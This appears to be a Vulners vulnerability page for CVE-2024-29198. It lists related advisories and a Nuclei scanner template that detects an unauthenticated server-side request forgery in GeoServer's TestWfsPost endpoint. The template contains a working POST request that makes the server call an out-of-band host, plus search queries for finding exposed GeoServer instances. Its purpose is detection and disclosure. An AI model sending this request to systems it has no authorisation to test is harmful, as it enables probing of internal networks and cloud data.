| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the TestWfsPost component in the software for administrative and publishing operations on the OSGeo GeoServer server allows a perpetrator to gain unauthorized access to protected information. | 29 Aug 202500:00 | – | bdu_fstec | |
| CVE-2024-29198 | 17 Jun 202519:39 | – | circl | |
| GeoServer 代码问题漏洞 | 10 Jun 202500:00 | – | cnnvd | |
| CVE-2024-29198 | 10 Jun 202514:27 | – | cve | |
| CVE-2024-29198 GeoServer Vulnerable to Unauthenticated SSRF via TestWfsPost | 10 Jun 202514:27 | – | cvelist | |
| EUVD-2024-26218 | 3 Oct 202520:07 | – | euvd | |
| GeoServer Vulnerable to Unauthenticated SSRF via TestWfsPost | 10 Jun 202514:13 | – | github | |
| GeoServer vulnerable to SSRF in TestWfsPost for specific targets, e.g. PHP + Nginx | 10 Jun 202520:17 | – | github | |
| CVE-2024-29198 | 10 Jun 202515:15 | – | nvd | |
| CVE-2024-29198 GeoServer Vulnerable to Unauthenticated SSRF via TestWfsPost | 10 Jun 202514:27 | – | osv |
id: CVE-2024-29198
info:
name: GeoServer Demo Request Endpoint - Server Side Request Forgery
author: iamnoooob,pdresearch
severity: high
description: |
It is possible to achieve Server Side Request Forgery (SSRF) via the Demo request endpoint if Proxy Base URL has not been set. An unauthenticated user can supply a request that will be issued by the server, allowing enumeration of internal networks and, in the case of cloud instances, access to sensitive data.
impact: |
An attacker can exploit this vulnerability to access internal resources, enumerate internal networks, and potentially access sensitive data in cloud environments through the server-side request forgery attack.
remediation: |
Upgrade to a patched version of GeoServer or configure the Proxy Base URL properly to prevent unauthorized server-side requests through the TestWfsPost endpoint.
reference:
- https://github.com/geoserver/geoserver/security/advisories/GHSA-5gw5-jccf-6hxw
- https://osgeo-org.atlassian.net/browse/GEOS-11390
- https://osgeo-org.atlassian.net/browse/GEOS-11794
- https://nvd.nist.gov/vuln/detail/CVE-2024-29198
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-29198
cwe-id: CWE-918
epss-score: 0.01923
epss-percentile: 0.77472
metadata:
verified: true
max-request: 1
vendor: osgeo
product: geoserver
shodan-query:
- http.title:"geoserver"
- server:"geohttpserver"
fofa-query:
- app="geoserver"
- title="geoserver"
google-query: intitle:"geoserver"
tags: cve,cve2024,ssrf,geoserver,oos,oast,vkev,vuln
variables:
string: "{{randstr}}"
http:
- raw:
- |
POST /geoserver/TestWfsPost HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
url=http://{{interactsh-url}}/?body={{string}}
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol, 'http')"
- "contains(content_type, 'text/plain')"
- "regex('^{{string}}$', body)"
- "status_code == 200"
condition: and
# digest: 4b0a00483046022100eb41cd9e8fbe77b665d6b0548ed9032301d76349488ca141e249a5e95ac433d9022100f0177cbbcc81d4b4d0382b61a2f32eb792e767270c148c20b694be91f1158503:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation